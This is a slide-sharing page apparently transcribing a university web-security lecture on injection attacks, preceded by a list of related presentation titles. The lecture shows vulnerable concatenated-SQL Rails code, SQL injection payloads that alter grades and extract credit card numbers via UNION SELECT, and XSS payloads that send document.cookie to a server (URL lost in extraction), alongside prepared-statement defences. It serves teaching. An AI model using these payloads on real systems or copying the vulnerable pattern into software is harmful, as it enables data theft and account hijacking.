CS 142 Lecture Notes: Injection AttacksSlide 1 Unsafe Server Code advisorName = params[:form][:advisor] students = Student.find_by_sql( "SELECT students.*

Slides:

Advertisements

Similar presentations

Nick Feamster CS 6262 Spring 2009

Advertisements

Closing the Gap: Analyzing the Limitations of Web Application Vulnerability Scanners David Shelly Randy Marchany Joseph Tront Virginia Polytechnic Institute.

CS 142 Lecture Notes: FormsSlide 1 Simple Form Product: Price:

© 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.

Nick Tsamis University of Tulsa CS 7493 April 2013.

Keys, Referential Integrity and PHP One to Many on the Web.

SQL Hacking I NTRODUCTION Data theft is becoming a major threat. Criminals have identified where the gold is. In the last year many databases from.

Project 7 Discussion Section XSS and SQL Injection in Rails.

Java Database Connectivity By: Abe Marji CS616. Agenda 1.Quick Review of Databases 2.What is SQL? 3.What is JDBC? 4.Advanced Functions of JDBC 5.Summary.

1 Foundations of Software Design Lecture 27: Java Database Programming Marti Hearst Fall 2002.

Computer Science 101 Web Access to Databases Overview of Web Access to Databases.

Dec 13 th CS555 presentation1 Yiwen Wang --“Securing the DB may be the single biggest action an organization can take to protect its assets” David C. Knox.

1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009.

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

PHP and SQL Server: Queries IST2101. Project Report 4 SQL Queries Due Sunday, 4/5 at 11:59pm Instructions on how to access team webspace and SQL database.

1 CS428 Web Engineering Lecture 23 MySQL Basics (PHP - VI)

Sys Prog & Scripting - HW Univ1 Systems Programming & Scripting Lecture 15: PHP Introduction.

Preventing SQL Injection ~example of SQL injection $user = $_POST[‘user’]; $pass = $_POST[‘pass’]; $query = DELETE FROM Users WHERE user = ‘$user’ AND.

Secure Software Engineering: Input Vulnerabilities

Workshop 3 Web Application Security Li Weichao March

By Daniel Siassi.  XHTML  For Structure  CSS  For Stylization of Structure  SQL Database  Store Customer, Calendar, and Order Data  PHP  Server-side.

CSCI 6962: Server-side Design and Programming JDBC Database Programming.

4-1 INTERNET DATABASE CONNECTOR Colorado Technical University IT420 Tim Peterson.

PHP Data Object (PDO) Khaled Al-Sham’aa. What is PDO? PDO is a PHP extension to formalise PHP's database connections by creating a uniform interface.

Database Processing with JSP ISYS 350. Example: Enter CID in a box and retrieve the customer record.

JDBC. JDBC Drivers JDBC is an alternative to ODBC and ADO that provides database access to programs written in Java.

Distributed Systems Lab Lecture -1-.  It is extremely simplified application will be realized with the aid of various middleware technologies.  It allows.

Lecture 16 Page 1 CS 236 Online SQL Injection Attacks Many web servers have backing databases –Much of their information stored in a database Web pages.

Database Processing with JSP ISYS 350. Example: Enter CID in a box and retrieve the customer record.

Web Application Security ECE ECE Internetwork Security What is a Web Application? An application generally comprised of a collection of scripts.

School of Computing and Information Systems CS 371 Web Application Programming Security Avoiding and Preventing Attacks.

C HAPTER 8 SQL Injection Slides adapted from "Foundations of Security: What Every Programmer Needs To Know" by Neil Daswani, Christoph Kern, and Anita.

The attacks ● XSS – type 1: non-persistent – type 2: persistent – Advanced: other keywords (, prompt()) or other technologies such as Flash.

Distributed Systems Lab.  It is extremely simplified application will be realized with the aid of various middleware technologies.  It allows the.

SQL Injection Jason Dunn. SQL Overview Structured Query Language For use with Databases Purpose is to retrieve information Main Statements Select Insert.

Input Validation – common associated risks  ______________ user input controls SQL statements ultimately executed by a database server

Aniket Joshi Justin Thomas. Agenda Introduction to SQL Injection SQL Injection Attack SQL Injection Prevention Summary.

By Sean Rose and Erik Hazzard.  SQL Injection is a technique that exploits security weaknesses of the database layer of an application in order to gain.

Web Security Group 5 Adam Swett Brian Marco. Why Web Security? Web sites and web applications constantly growing Complex business applications are now.

PHP Workshop ‹#› PHP Data Object (PDO). PHP Workshop ‹#› What is PDO? PDO is a PHP extension to formalise PHP's database connections by creating a uniform.

Li Tak Sing COMPS311F. Database programming JDBC (Java Database Connectivity) Java version of ODBC (Open Database Connectivity) ODBC provides a standard.

Foundation year Lec.5: Lec.5: Database Management System Lec.5: Lec.5: Database Management System Lecturer: Fatma El-Zahraa Mohamed Year: 2015/2016.

Forms 5.02 Understand database queries, forms, and reports.

PHP Workshop ‹#› أطلق إبداعك 2 أطلق إبداعك 2 مدرس معتمد من مركز زووم PHP Data Object (PDO)

CS 142 Lecture Notes: Injection AttacksSlide 1 xkcd.

Database Security Cmpe 226 Fall 2015 By Akanksha Jain Jerry Mengyuan Zheng.

JDBC CS 260 Database Systems. Overview  Introduction  JDBC driver types  Eclipse project setup  Programming with JDBC  Prepared statements  SQL.

CS 142 Lecture Notes: Injection AttacksSlide 1 Unsafe Server Code advisorName = params[:form][:advisor] students = Student.find_by_sql( "SELECT students.*

What Is XSS ? ! Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to.

How Web Database Architectures Work CPS181s April 8, 2003.

Example – SQL Injection MySQL & PHP code: // The next instruction prompts the user is to supply an ID $personID = getIDstringFromUser(); $sqlQuery = "SELECT.

SQL pepper. Why SQL File I/O is a great deal of code Optimal file organization and indexing is critical and a great deal of code and theory implementation.

ASP.NET WEB Applications. ASP.NET  Web application framework developed by Microsoft  Build dynamic data driven web applications and web services  Subset.

Database Processing with JSP ISYS 350. Database Applications Applications Database Server Queries/Updates Results.

Web Security (cont.) 1. Referral issues r HTTP referer (originally referrer) – HTTP header that designates calling resource  Page on which a link is.

SQL Injection Attacks.

Database: JDBC Overview

Database System Implementation CSE 507

Group 18: Chris Hood Brett Poche

Web-Technology Exam preparation.

CS 371 Web Application Programming

CS320 Web and Internet Programming Database Access with JDBC

Database JDBC Overview CS Programming Languages for Web Applications

PHP: Security issues FdSc Module 109 Server side scripting and

امنیت نرم‌افزارهای وب تقديم به پيشگاه مقدس امام عصر (عج) عباس نادری

Introduction of Week 11 Return assignment 9-1 Collect assignment 10-1

Web Programming Language

Protecting Against Common Web Application Vulnerabilities

Presentation transcript:

CS 142 Lecture Notes: Injection AttacksSlide 1 Unsafe Server Code advisorName = params[:form][:advisor] students = Student.find_by_sql( "SELECT students.* " + "FROM students, advisors " + "WHERE student.advisor_id = advisor.id " + "AND advisor.name = '" + advisorName + "'"); SELECT students.* FROM students, advisors WHERE student.advisor_id = advisor.id AND advisor.name = 'Jones' Typical query: Value from form field

CS 142 Lecture Notes: Injection AttacksSlide 2 Injection Attack Jones'; UPDATE grades SET g.grade = 4.0 FROM grades g, students s WHERE g.student_id = s.id AND s.name = 'Smith SELECT students.* FROM students, advisors WHERE student.advisor_id = advisor.id AND advisor.name = 'Jones'; UPDATE grades SET g.grade = 4.0 FROM grades g, students s WHERE g.student_id = s.id AND s.name = 'Smith' Resulting query: Enter the following in the "Advisor name" field:

CS 142 Lecture Notes: Injection AttacksSlide 3 Stealing Private Information

CS 142 Lecture Notes: Injection AttacksSlide 4 Stealing Private Info, cont'd month = params[:form][:month] orders = Orders.find_by_sql( "SELECT pizza, toppings, quantity, date " + "FROM orders " + "WHERE user_id=" + user_id + "AND order_month=" + month); October AND 1=0 UNION SELECT name as pizza, card_num as toppings, exp_mon as quantity, exp_year as date FROM credit_cards ' What if "month" is: Server query code:

CS 142 Lecture Notes: Injection AttacksSlide 5 Resulting Query SELECT pizza, toppings, quantity, date FROM orders WHERE user_id=94412 AND order_month=October AND 1=0 UNION SELECT name as pizza, card_num as toppings, exp_mon as quantity, exp_year as date FROM credit_cards

CS 142 Lecture Notes: Injection AttacksSlide 6 Resulting Query SELECT pizza, toppings, quantity, date FROM orders WHERE user_id=94412 AND order_month=October AND 1=0 UNION SELECT name as pizza, card_num as toppings, exp_mon as quantity, exp_year as date FROM credit_cards

● CardSystems  Credit card payment processing company  SQL injection attack in June 2005 ● The Attack  Credit card #s stored unencrypted  263,000 credit card #s stolen from database  43 million credit card #s exposed CS 142 Lecture Notes: Injection AttacksSlide 7 CardSystems Attack 7

CS 142 Lecture Notes: Injection AttacksSlide 8 Let Rails Handle SQL Escaping Student.find_by_sql("SELECT students.* " + "FROM students, advisors " + "WHERE student.advisor_id = advisor.id " + "AND advisor.name = ?", params[:form][:advisor])

CS 142 Lecture Notes: Injection AttacksSlide 9 Prepared Statements $statement = odbc_prepare($connection, "SELECT * FROM students ". "WHERE advisor = ? AND gpa >= ?;"); odbc_execute($statement, array($advisor, $gpa)); statement = connection.prepareStatement( "SELECT * FROM students " + "WHERE advisor = ? AND gpa >= ?;"); statement.setString(1, advisor); statement.setString(2, gpa); ResultSet rs = statement.executeQuery(); Java: PHP:

CS 142 Lecture Notes: Injection AttacksSlide 10 Stored XSS Attack I agree completely with Alice... img = document.getElementById("cookieMonster"); img.src = " + encodeURIComponent(document.cookie); No escaping! Attacking blog entry: Buggy server template:

CS 142 Lecture Notes: Injection AttacksSlide 11 Reflected XSS Attack... Search Results Results for... No escaping! Buggy server template: Justin Bieber img = document.getElementById("cookieMonster"); img.src = " + encodeURIComponent(document.cookie); Attacking search entry:

CS 142 Lecture Notes: CookiesSlide 12